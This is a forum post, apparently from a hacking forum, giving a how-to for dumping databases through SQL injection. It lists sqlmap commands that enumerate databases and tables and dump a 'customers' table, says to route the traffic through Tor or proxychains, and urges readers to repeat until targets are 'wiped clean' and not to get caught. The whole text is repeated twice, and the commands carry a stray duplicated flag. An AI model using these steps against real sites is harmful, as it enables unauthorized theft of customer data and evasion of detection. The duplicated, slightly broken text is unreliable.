Jul 14, 2024, 06:41 PM
(im not going over how to find them but here's how you go for some dumps)
Alright so today were going through the whole process for dummies first off understand SQL injection occurs because we can manipulate the query string to give us information from other places in the database but check this out:
First off there can be multiple databases that can possibly be reached from a single injection point so once youve identified a spot valid to SQLi use SQLmap to get a deeper foothold to where you can maneuver. the tool Ghauri has a little bit better of a variety of attacks so if SQLmap doesn't hit then use that. if you have a special or custom SQLi string for a certain service you can add it to SQLmaps payload list located at /usr/share/sqlmap/data/xml/payloads/*. there in XML format but its easy to do.
okay so before you even use sqlmap i recommend running the tor command and then running sqlmap with --tor but thats just me.
if you want to do this with ghauri you still can by using proxychains4.
I dont recommend blindy going in and seeing what you get i recommend the steps for exploitation should be:
#dump all the databases it can reach
$ sqlmap -sqlmap -u target.com/example.php?id=* --batch --dbs --risk 2 --level 3 --random-agent --tor
# now pick a database and target tables
$ sqlmap -sqlmap -u target.com/example.php?id=* --batch -D Dbase1 --tables --risk 2 --level 3 --random-agent --tor
# now that you know what the database looks like you can pick and choose want you want instead of having to organize later.
$ sqlmap -sqlmap -u target.com/example.php?id=* --batch -D Dbase1 -T customers --risk 2 --level 3 --random-agent --tor
after this just rinse and repeat until there wiped clean plus you can run multiple dumps at once with this method but just remember don't get caught
Alright so today were going through the whole process for dummies first off understand SQL injection occurs because we can manipulate the query string to give us information from other places in the database but check this out:
First off there can be multiple databases that can possibly be reached from a single injection point so once youve identified a spot valid to SQLi use SQLmap to get a deeper foothold to where you can maneuver. the tool Ghauri has a little bit better of a variety of attacks so if SQLmap doesn't hit then use that. if you have a special or custom SQLi string for a certain service you can add it to SQLmaps payload list located at /usr/share/sqlmap/data/xml/payloads/*. there in XML format but its easy to do.
okay so before you even use sqlmap i recommend running the tor command and then running sqlmap with --tor but thats just me.
if you want to do this with ghauri you still can by using proxychains4.
I dont recommend blindy going in and seeing what you get i recommend the steps for exploitation should be:
#dump all the databases it can reach
$ sqlmap -sqlmap -u target.com/example.php?id=* --batch --dbs --risk 2 --level 3 --random-agent --tor
# now pick a database and target tables
$ sqlmap -sqlmap -u target.com/example.php?id=* --batch -D Dbase1 --tables --risk 2 --level 3 --random-agent --tor
# now that you know what the database looks like you can pick and choose want you want instead of having to organize later.
$ sqlmap -sqlmap -u target.com/example.php?id=* --batch -D Dbase1 -T customers --risk 2 --level 3 --random-agent --tor
after this just rinse and repeat until there wiped clean plus you can run multiple dumps at once with this method but just remember don't get caught
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Self
Ban Reason: Self